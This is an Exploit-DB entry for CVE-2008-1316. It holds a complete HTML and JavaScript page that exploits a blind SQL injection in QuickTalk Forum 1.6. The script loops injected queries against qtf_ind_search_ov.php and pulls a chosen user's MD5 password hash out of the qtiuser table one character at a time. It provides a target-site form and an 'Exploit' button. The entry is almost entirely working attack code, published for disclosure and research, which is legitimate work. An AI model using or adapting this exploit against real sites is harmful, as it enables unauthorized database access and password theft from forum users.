QuickTalk Forum 1.6 - Blind SQL Injection

EDB-ID:

5240

CVE:

2008-1316

EDB Verified:

Author:

t0pP8uZz

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-03-12

Vulnerable App: 
<html>
<head>
<title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
	-----------------------------------------------------------------------------------------------
	- QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) -
	- Info ---------------------------------------------------------------------------------------
	- Author: t0pP8uZz & xprog -----------------------------------------------------------
	- Exploit Coded By t0pP8uZz ---------------------------------------------------------
	- Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------
	----------------------------------------------------------------------------------------------
	- Passwords ARE IN MD5           ----------------------------------------------------
	- Peace -----------------------------------------------------------------------------------
	---------------------------------------------------------------------------------------------
*/

var site, uid, res = "";

function Start() {
	
	site = document.getElementById("site").value;
	uid  = document.getElementById("pid").value;
	document.getElementById("output").value = "Exploiting, Please Wait..";
	
	Main(1, 48);
}

function Main(substr, num) {

	var xmlhttp = false;
	var url     = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*";
	
	try {
		xmlhttp = new XMLHttpRequest();
	} catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); }
	
	if(xmlhttp) {
	
		netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
		xmlhttp.onreadystatechange = function() {
		
			if(xmlhttp.readyState == 4) {
			
				var content = xmlhttp.responseText;
				
				var ele = document.getElementById("output");
				if(!content.match(/0 Found/i)) {
					res += String.fromCharCode(num);
					ele.value = res;
					num = 48;
					substr++;
				}
				else {
					if(num == 59) { num = 96; }
					else { num++; }
				}
				
				if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; }
				Main(substr, num)
			}
		};
		xmlhttp.open("GET", url, true);
		xmlhttp.send(null);
	}
}

</script>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000;  font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
</head>
<body>
<p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p>
<p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done)
<p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>

# milw0rm.com [2008-03-12]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services